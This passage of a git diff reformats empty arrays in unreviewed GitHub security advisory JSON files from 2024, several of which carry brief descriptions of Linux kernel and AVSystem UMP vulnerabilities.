"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-v35r-73cx-8h67/GHSA-v35r-73cx-8h67.json b/advisories/unreviewed/2024/02/GHSA-v35r-73cx-8h67/GHSA-v35r-73cx-8h67.json
index 2aaa15f9540..7d2501e88f7 100644
--- a/advisories/unreviewed/2024/02/GHSA-v35r-73cx-8h67/GHSA-v35r-73cx-8h67.json
+++ b/advisories/unreviewed/2024/02/GHSA-v35r-73cx-8h67/GHSA-v35r-73cx-8h67.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-v96m-4x27-3m5j/GHSA-v96m-4x27-3m5j.json b/advisories/unreviewed/2024/02/GHSA-v96m-4x27-3m5j/GHSA-v96m-4x27-3m5j.json
index 31673b3a3d3..4b21d4558c9 100644
--- a/advisories/unreviewed/2024/02/GHSA-v96m-4x27-3m5j/GHSA-v96m-4x27-3m5j.json
+++ b/advisories/unreviewed/2024/02/GHSA-v96m-4x27-3m5j/GHSA-v96m-4x27-3m5j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-vr4j-34fw-6v8v/GHSA-vr4j-34fw-6v8v.json b/advisories/unreviewed/2024/02/GHSA-vr4j-34fw-6v8v/GHSA-vr4j-34fw-6v8v.json
index afa0512a0b1..6903c68b894 100644
--- a/advisories/unreviewed/2024/02/GHSA-vr4j-34fw-6v8v/GHSA-vr4j-34fw-6v8v.json
+++ b/advisories/unreviewed/2024/02/GHSA-vr4j-34fw-6v8v/GHSA-vr4j-34fw-6v8v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-vrhp-w2wh-93c3/GHSA-vrhp-w2wh-93c3.json b/advisories/unreviewed/2024/02/GHSA-vrhp-w2wh-93c3/GHSA-vrhp-w2wh-93c3.json
index 6198b614ffd..36ad7b282ba 100644
--- a/advisories/unreviewed/2024/02/GHSA-vrhp-w2wh-93c3/GHSA-vrhp-w2wh-93c3.json
+++ b/advisories/unreviewed/2024/02/GHSA-vrhp-w2wh-93c3/GHSA-vrhp-w2wh-93c3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-vvpf-53qx-cxhh/GHSA-vvpf-53qx-cxhh.json b/advisories/unreviewed/2024/02/GHSA-vvpf-53qx-cxhh/GHSA-vvpf-53qx-cxhh.json
index ecc85fe33e5..cbb877bd53c 100644
--- a/advisories/unreviewed/2024/02/GHSA-vvpf-53qx-cxhh/GHSA-vvpf-53qx-cxhh.json
+++ b/advisories/unreviewed/2024/02/GHSA-vvpf-53qx-cxhh/GHSA-vvpf-53qx-cxhh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-vw87-wrx2-xwxq/GHSA-vw87-wrx2-xwxq.json b/advisories/unreviewed/2024/02/GHSA-vw87-wrx2-xwxq/GHSA-vw87-wrx2-xwxq.json
index f4d24c3d20f..56b59da102a 100644
--- a/advisories/unreviewed/2024/02/GHSA-vw87-wrx2-xwxq/GHSA-vw87-wrx2-xwxq.json
+++ b/advisories/unreviewed/2024/02/GHSA-vw87-wrx2-xwxq/GHSA-vw87-wrx2-xwxq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-vx3h-cj8w-2h2c/GHSA-vx3h-cj8w-2h2c.json b/advisories/unreviewed/2024/02/GHSA-vx3h-cj8w-2h2c/GHSA-vx3h-cj8w-2h2c.json
index fbb5908e30e..539bcc6e75a 100644
--- a/advisories/unreviewed/2024/02/GHSA-vx3h-cj8w-2h2c/GHSA-vx3h-cj8w-2h2c.json
+++ b/advisories/unreviewed/2024/02/GHSA-vx3h-cj8w-2h2c/GHSA-vx3h-cj8w-2h2c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-wcj2-j3c5-773j/GHSA-wcj2-j3c5-773j.json b/advisories/unreviewed/2024/02/GHSA-wcj2-j3c5-773j/GHSA-wcj2-j3c5-773j.json
index c2ac414cf32..fa4bf01eea9 100644
--- a/advisories/unreviewed/2024/02/GHSA-wcj2-j3c5-773j/GHSA-wcj2-j3c5-773j.json
+++ b/advisories/unreviewed/2024/02/GHSA-wcj2-j3c5-773j/GHSA-wcj2-j3c5-773j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-wmgf-9m3j-mpmj/GHSA-wmgf-9m3j-mpmj.json b/advisories/unreviewed/2024/02/GHSA-wmgf-9m3j-mpmj/GHSA-wmgf-9m3j-mpmj.json
index 5eca2f1415a..31734013de8 100644
--- a/advisories/unreviewed/2024/02/GHSA-wmgf-9m3j-mpmj/GHSA-wmgf-9m3j-mpmj.json
+++ b/advisories/unreviewed/2024/02/GHSA-wmgf-9m3j-mpmj/GHSA-wmgf-9m3j-mpmj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-wrgr-v88r-75jx/GHSA-wrgr-v88r-75jx.json b/advisories/unreviewed/2024/02/GHSA-wrgr-v88r-75jx/GHSA-wrgr-v88r-75jx.json
index 23869a7673b..7fa6389d167 100644
--- a/advisories/unreviewed/2024/02/GHSA-wrgr-v88r-75jx/GHSA-wrgr-v88r-75jx.json
+++ b/advisories/unreviewed/2024/02/GHSA-wrgr-v88r-75jx/GHSA-wrgr-v88r-75jx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -35,9 +33,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-x3vr-472g-gmxm/GHSA-x3vr-472g-gmxm.json b/advisories/unreviewed/2024/02/GHSA-x3vr-472g-gmxm/GHSA-x3vr-472g-gmxm.json
index ceec251fc82..beca0116594 100644
--- a/advisories/unreviewed/2024/02/GHSA-x3vr-472g-gmxm/GHSA-x3vr-472g-gmxm.json
+++ b/advisories/unreviewed/2024/02/GHSA-x3vr-472g-gmxm/GHSA-x3vr-472g-gmxm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-x78h-2vjp-c8jp/GHSA-x78h-2vjp-c8jp.json b/advisories/unreviewed/2024/02/GHSA-x78h-2vjp-c8jp/GHSA-x78h-2vjp-c8jp.json
index b3a55acc70e..deeb1c3ad26 100644
--- a/advisories/unreviewed/2024/02/GHSA-x78h-2vjp-c8jp/GHSA-x78h-2vjp-c8jp.json
+++ b/advisories/unreviewed/2024/02/GHSA-x78h-2vjp-c8jp/GHSA-x78h-2vjp-c8jp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-xc99-434w-j882/GHSA-xc99-434w-j882.json b/advisories/unreviewed/2024/02/GHSA-xc99-434w-j882/GHSA-xc99-434w-j882.json
index 438a17953f9..2b6c3c6ef7f 100644
--- a/advisories/unreviewed/2024/02/GHSA-xc99-434w-j882/GHSA-xc99-434w-j882.json
+++ b/advisories/unreviewed/2024/02/GHSA-xc99-434w-j882/GHSA-xc99-434w-j882.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-xcg4-rx98-2f6x/GHSA-xcg4-rx98-2f6x.json b/advisories/unreviewed/2024/02/GHSA-xcg4-rx98-2f6x/GHSA-xcg4-rx98-2f6x.json
index 74032db246b..3dddac9aae0 100644
--- a/advisories/unreviewed/2024/02/GHSA-xcg4-rx98-2f6x/GHSA-xcg4-rx98-2f6x.json
+++ b/advisories/unreviewed/2024/02/GHSA-xcg4-rx98-2f6x/GHSA-xcg4-rx98-2f6x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-xgm2-cpgm-525v/GHSA-xgm2-cpgm-525v.json b/advisories/unreviewed/2024/02/GHSA-xgm2-cpgm-525v/GHSA-xgm2-cpgm-525v.json
index b4cbf73dbc7..e8c11836578 100644
--- a/advisories/unreviewed/2024/02/GHSA-xgm2-cpgm-525v/GHSA-xgm2-cpgm-525v.json
+++ b/advisories/unreviewed/2024/02/GHSA-xgm2-cpgm-525v/GHSA-xgm2-cpgm-525v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-xhg6-78jc-3cwf/GHSA-xhg6-78jc-3cwf.json b/advisories/unreviewed/2024/02/GHSA-xhg6-78jc-3cwf/GHSA-xhg6-78jc-3cwf.json
index 0ee491916fd..66a21be9e01 100644
--- a/advisories/unreviewed/2024/02/GHSA-xhg6-78jc-3cwf/GHSA-xhg6-78jc-3cwf.json
+++ b/advisories/unreviewed/2024/02/GHSA-xhg6-78jc-3cwf/GHSA-xhg6-78jc-3cwf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-xp5p-m9rq-h59j/GHSA-xp5p-m9rq-h59j.json b/advisories/unreviewed/2024/02/GHSA-xp5p-m9rq-h59j/GHSA-xp5p-m9rq-h59j.json
index 3725a00ca94..5509f1d5f5a 100644
--- a/advisories/unreviewed/2024/02/GHSA-xp5p-m9rq-h59j/GHSA-xp5p-m9rq-h59j.json
+++ b/advisories/unreviewed/2024/02/GHSA-xp5p-m9rq-h59j/GHSA-xp5p-m9rq-h59j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-xq36-jhc6-fxw2/GHSA-xq36-jhc6-fxw2.json b/advisories/unreviewed/2024/02/GHSA-xq36-jhc6-fxw2/GHSA-xq36-jhc6-fxw2.json
index 984cef87de9..62343aec171 100644
--- a/advisories/unreviewed/2024/02/GHSA-xq36-jhc6-fxw2/GHSA-xq36-jhc6-fxw2.json
+++ b/advisories/unreviewed/2024/02/GHSA-xq36-jhc6-fxw2/GHSA-xq36-jhc6-fxw2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -35,9 +33,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-xq4r-4xfh-vch8/GHSA-xq4r-4xfh-vch8.json b/advisories/unreviewed/2024/02/GHSA-xq4r-4xfh-vch8/GHSA-xq4r-4xfh-vch8.json
index 975ab949896..7c45f564172 100644
--- a/advisories/unreviewed/2024/02/GHSA-xq4r-4xfh-vch8/GHSA-xq4r-4xfh-vch8.json
+++ b/advisories/unreviewed/2024/02/GHSA-xq4r-4xfh-vch8/GHSA-xq4r-4xfh-vch8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-xqc9-88mp-rfhw/GHSA-xqc9-88mp-rfhw.json b/advisories/unreviewed/2024/02/GHSA-xqc9-88mp-rfhw/GHSA-xqc9-88mp-rfhw.json
index 0d34b1ddaa8..847b48c5252 100644
--- a/advisories/unreviewed/2024/02/GHSA-xqc9-88mp-rfhw/GHSA-xqc9-88mp-rfhw.json
+++ b/advisories/unreviewed/2024/02/GHSA-xqc9-88mp-rfhw/GHSA-xqc9-88mp-rfhw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-2948-3mj2-4gw2/GHSA-2948-3mj2-4gw2.json b/advisories/unreviewed/2024/03/GHSA-2948-3mj2-4gw2/GHSA-2948-3mj2-4gw2.json
index fbd50098fb0..6e8a629e299 100644
--- a/advisories/unreviewed/2024/03/GHSA-2948-3mj2-4gw2/GHSA-2948-3mj2-4gw2.json
+++ b/advisories/unreviewed/2024/03/GHSA-2948-3mj2-4gw2/GHSA-2948-3mj2-4gw2.json
@@ -7,12 +7,8 @@
"CVE-2021-47062"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: SVM: Use online_vcpus, not created_vcpus, to iterate over vCPUs\n\nUse the kvm_for_each_vcpu() helper to iterate over vCPUs when encrypting\nVMSAs for SEV, which effectively switches to use online_vcpus instead of\ncreated_vcpus. This fixes a possible null-pointer dereference as\ncreated_vcpus does not guarantee a vCPU exists, since it is updated at\nthe very beginning of KVM_CREATE_VCPU. created_vcpus exists to allow the\nbulk of vCPU creation to run in parallel, while still correctly\nrestricting the max number of max vCPUs.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-2j6j-3rj5-q42q/GHSA-2j6j-3rj5-q42q.json b/advisories/unreviewed/2024/03/GHSA-2j6j-3rj5-q42q/GHSA-2j6j-3rj5-q42q.json
index 13ff645179f..1bee9e36293 100644
--- a/advisories/unreviewed/2024/03/GHSA-2j6j-3rj5-q42q/GHSA-2j6j-3rj5-q42q.json
+++ b/advisories/unreviewed/2024/03/GHSA-2j6j-3rj5-q42q/GHSA-2j6j-3rj5-q42q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-2jhg-m9q6-9g5r/GHSA-2jhg-m9q6-9g5r.json b/advisories/unreviewed/2024/03/GHSA-2jhg-m9q6-9g5r/GHSA-2jhg-m9q6-9g5r.json
index bc3f3240090..5672cb89929 100644
--- a/advisories/unreviewed/2024/03/GHSA-2jhg-m9q6-9g5r/GHSA-2jhg-m9q6-9g5r.json
+++ b/advisories/unreviewed/2024/03/GHSA-2jhg-m9q6-9g5r/GHSA-2jhg-m9q6-9g5r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-2m47-v5fj-pw7f/GHSA-2m47-v5fj-pw7f.json b/advisories/unreviewed/2024/03/GHSA-2m47-v5fj-pw7f/GHSA-2m47-v5fj-pw7f.json
index d4990040db7..d1178b8d145 100644
--- a/advisories/unreviewed/2024/03/GHSA-2m47-v5fj-pw7f/GHSA-2m47-v5fj-pw7f.json
+++ b/advisories/unreviewed/2024/03/GHSA-2m47-v5fj-pw7f/GHSA-2m47-v5fj-pw7f.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-3phv-44jf-4v33/GHSA-3phv-44jf-4v33.json b/advisories/unreviewed/2024/03/GHSA-3phv-44jf-4v33/GHSA-3phv-44jf-4v33.json
index af92af48c48..822bf705041 100644
--- a/advisories/unreviewed/2024/03/GHSA-3phv-44jf-4v33/GHSA-3phv-44jf-4v33.json
+++ b/advisories/unreviewed/2024/03/GHSA-3phv-44jf-4v33/GHSA-3phv-44jf-4v33.json
@@ -7,12 +7,8 @@
"CVE-2024-25654"
],
"details": "Insecure permissions for log files of AVSystem Unified Management Platform (UMP) 23.07.0.16567~LTS allow members (with local access to the UMP application server) to access credentials to authenticate to all services, and to decrypt sensitive data stored in the database.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-4486-4g8h-533q/GHSA-4486-4g8h-533q.json b/advisories/unreviewed/2024/03/GHSA-4486-4g8h-533q/GHSA-4486-4g8h-533q.json
index 343120973b9..b01d39c2753 100644
--- a/advisories/unreviewed/2024/03/GHSA-4486-4g8h-533q/GHSA-4486-4g8h-533q.json
+++ b/advisories/unreviewed/2024/03/GHSA-4486-4g8h-533q/GHSA-4486-4g8h-533q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-4j4h-xmrg-6469/GHSA-4j4h-xmrg-6469.json b/advisories/unreviewed/2024/03/GHSA-4j4h-xmrg-6469/GHSA-4j4h-xmrg-6469.json
index b6886235dda..b6ab292c47e 100644
--- a/advisories/unreviewed/2024/03/GHSA-4j4h-xmrg-6469/GHSA-4j4h-xmrg-6469.json
+++ b/advisories/unreviewed/2024/03/GHSA-4j4h-xmrg-6469/GHSA-4j4h-xmrg-6469.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-5fwg-75w6-7gf9/GHSA-5fwg-75w6-7gf9.json b/advisories/unreviewed/2024/03/GHSA-5fwg-75w6-7gf9/GHSA-5fwg-75w6-7gf9.json
index bca4f069c88..de9c297ce89 100644
--- a/advisories/unreviewed/2024/03/GHSA-5fwg-75w6-7gf9/GHSA-5fwg-75w6-7gf9.json
+++ b/advisories/unreviewed/2024/03/GHSA-5fwg-75w6-7gf9/GHSA-5fwg-75w6-7gf9.json
@@ -7,12 +7,8 @@
"CVE-2021-47056"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: qat - ADF_STATUS_PF_RUNNING should be set after adf_dev_init\n\nADF_STATUS_PF_RUNNING is (only) used and checked by adf_vf2pf_shutdown()\nbefore calling adf_iov_putmsg()->mutex_lock(vf2pf_lock), however the\nvf2pf_lock is initialized in adf_dev_init(), which can fail and when it\nfail, the vf2pf_lock is either not initialized or destroyed, a subsequent\nuse of vf2pf_lock will cause issue.\nTo fix this issue, only set this flag if adf_dev_init() returns 0.\n\n[ 7.178404] BUG: KASAN: user-memory-access in __mutex_lock.isra.0+0x1ac/0x7c0\n[ 7.180345] Call Trace:\n[ 7.182576] mutex_lock+0xc9/0xd0\n[ 7.183257] adf_iov_putmsg+0x118/0x1a0 [intel_qat]\n[ 7.183541] adf_vf2pf_shutdown+0x4d/0x7b [intel_qat]\n[ 7.183834] adf_dev_shutdown+0x172/0x2b0 [intel_qat]\n[ 7.184127] adf_probe+0x5e9/0x600 [qat_dh895xccvf]",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -52,9 +48,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-5hc3-jgcx-6wj9/GHSA-5hc3-jgcx-6wj9.json b/advisories/unreviewed/2024/03/GHSA-5hc3-jgcx-6wj9/GHSA-5hc3-jgcx-6wj9.json
index 1de11d8192f..6dcf845bf5b 100644
--- a/advisories/unreviewed/2024/03/GHSA-5hc3-jgcx-6wj9/GHSA-5hc3-jgcx-6wj9.json
+++ b/advisories/unreviewed/2024/03/GHSA-5hc3-jgcx-6wj9/GHSA-5hc3-jgcx-6wj9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-5q47-v43c-crgw/GHSA-5q47-v43c-crgw.json b/advisories/unreviewed/2024/03/GHSA-5q47-v43c-crgw/GHSA-5q47-v43c-crgw.json
index db96ac5408f..f4ccb94c040 100644
--- a/advisories/unreviewed/2024/03/GHSA-5q47-v43c-crgw/GHSA-5q47-v43c-crgw.json
+++ b/advisories/unreviewed/2024/03/GHSA-5q47-v43c-crgw/GHSA-5q47-v43c-crgw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-642x-2cm7-w2f3/GHSA-642x-2cm7-w2f3.json b/advisories/unreviewed/2024/03/GHSA-642x-2cm7-w2f3/GHSA-642x-2cm7-w2f3.json
index c725103538b..645bf680e1a 100644
--- a/advisories/unreviewed/2024/03/GHSA-642x-2cm7-w2f3/GHSA-642x-2cm7-w2f3.json
+++ b/advisories/unreviewed/2024/03/GHSA-642x-2cm7-w2f3/GHSA-642x-2cm7-w2f3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-64qm-44w9-r4fm/GHSA-64qm-44w9-r4fm.json b/advisories/unreviewed/2024/03/GHSA-64qm-44w9-r4fm/GHSA-64qm-44w9-r4fm.json
index 190796c92b4..c9072c6558b 100644
--- a/advisories/unreviewed/2024/03/GHSA-64qm-44w9-r4fm/GHSA-64qm-44w9-r4fm.json
+++ b/advisories/unreviewed/2024/03/GHSA-64qm-44w9-r4fm/GHSA-64qm-44w9-r4fm.json
@@ -7,12 +7,8 @@
"CVE-2021-47059"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: sun8i-ss - fix result memory leak on error path\n\nThis patch fixes a memory leak on an error path.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-67fh-mwc3-f4mg/GHSA-67fh-mwc3-f4mg.json b/advisories/unreviewed/2024/03/GHSA-67fh-mwc3-f4mg/GHSA-67fh-mwc3-f4mg.json
index 2b704877ec7..8c58c77412f 100644
--- a/advisories/unreviewed/2024/03/GHSA-67fh-mwc3-f4mg/GHSA-67fh-mwc3-f4mg.json
+++ b/advisories/unreviewed/2024/03/GHSA-67fh-mwc3-f4mg/GHSA-67fh-mwc3-f4mg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-686x-3pf5-phx7/GHSA-686x-3pf5-phx7.json b/advisories/unreviewed/2024/03/GHSA-686x-3pf5-phx7/GHSA-686x-3pf5-phx7.json
index 5e1088ca6f4..2a7cbf5af53 100644
--- a/advisories/unreviewed/2024/03/GHSA-686x-3pf5-phx7/GHSA-686x-3pf5-phx7.json
+++ b/advisories/unreviewed/2024/03/GHSA-686x-3pf5-phx7/GHSA-686x-3pf5-phx7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/03/GHSA-69w7-5x2m-p8cp/GHSA-69w7-5x2m-p8cp.json b/advisories/unreviewed/2024/03/GHSA-69w7-5x2m-p8cp/GHSA-69w7-5x2m-p8cp.json
index 0e37116ceb7..9f96dd778d9 100644
--- a/advisories/unreviewed/2024/03/GHSA-69w7-5x2m-p8cp/GHSA-69w7-5x2m-p8cp.json
+++ b/advisories/unreviewed/2024/03/GHSA-69w7-5x2m-p8cp/GHSA-69w7-5x2m-p8cp.json
@@ -7,12 +7,8 @@
"CVE-2021-47058"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nregmap: set debugfs_name to NULL after it is freed\n\nThere is a upstream commit cffa4b2122f5(\"regmap:debugfs:\nFix a memory leak when calling regmap_attach_dev\") that\nadds a if condition when create name for debugfs_name.\nWith below function invoking logical, debugfs_name is\nfreed in regmap_debugfs_exit(), but it is not created again\nbecause of the if condition introduced by above commit.\nregmap_reinit_cache()\n\tregmap_debugfs_exit()\n\t...\n\tregmap_debugfs_init()\nSo, set debugfs_name to NULL after it is freed.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -44,9 +40,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/03/GHSA-6pw4-99gp-9gj7/GHSA-6pw4-99gp-9gj7.json b/advisories/unreviewed/2024/03/GHSA-6pw4-99gp-9gj7/GHSA-6pw4-99gp-9gj7.json
index 21b07d62657..ae5667ac8c1 100644
--- a/advisories/unreviewed/2024/03/GHSA-6pw4-99gp-9gj7/GHSA-6pw4-99gp-9gj7.json
+++ b/advisories/unreviewed/2024/03/GHSA-6pw4-99gp-9gj7/GHSA-6pw4-99gp-9gj7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -35,9 +33,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
